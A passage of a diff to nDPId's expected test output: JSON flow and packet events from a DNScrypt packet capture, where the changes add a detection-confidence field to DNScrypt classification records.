AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":33369,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":33369,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":34885,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":946739305192,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAAIcZY1AAL0RdEwKAAABwx5eHIhFIPsCCOQQMswBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":34885,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":34885,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":118,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAABQZYwAub0RtWAKAAABwx5eHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":118,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44093,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":946739305192,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAAIcZY5AAL0RdEsKAAABwx5eHKw9IPsCCOQQMsoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44093,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44093,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":53811,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":946739305192,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAAXcZY8gAL0RkIoKAAABwx5eHNIzIPsGBOBTMskBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":53811,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":53811,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":121,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAABQZY8Aub0RtV0KAAABwx5eHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":121,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":946739305192,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"ts_msec":946739305192,"pkt":"ZmZmZmZmRERERERECABFAADSF6JAADcRFw2LO8h0CgAAAQG7ktsAvkG1c5CBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABwAwAEAABAABwgAB9fEROU0MAAgAABjDMcMbz7yA0RLegztcBfq7VeYHKBaMLey+aMNVSTMo4Qj51\/gmF1JL4mny7Kl7CHKqU1ouuslp1lX1chQTTD+JLJw323p3g\/i9lq2cywGbzFxjIXwRFrAIdM6Cq64tY4ksnDfbeneAAAAABX1N7RV9UzMU="}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44282,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":946739305192,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAAXcZZAgAL0RkIkKAAABwx5eHKz6IPsGBAWJMs0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44282,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44282,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":124,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAABQZZAAub0RtVwKAAABwx5eHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":124,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":946739305194,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"ts_msec":946739305194,"pkt":"ZmZmZmZmRERERERECABFAADSF6NAADcRFwyLO8h0CgAAAQG75zoAvu1Tc5KBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABwAwAEAABAABwgAB9fEROU0MAAgAABjDMcMbz7yA0RLegztcBfq7VeYHKBaMLey+aMNVSTMo4Qj51\/gmF1JL4mny7Kl7CHKqU1ouuslp1lX1chQTTD+JLJw323p3g\/i9lq2cywGbzFxjIXwRFrAIdM6Cq64tY4ksnDfbeneAAAAABX1N7RV9UzMU="}
@@ -271,26 +271,26 @@
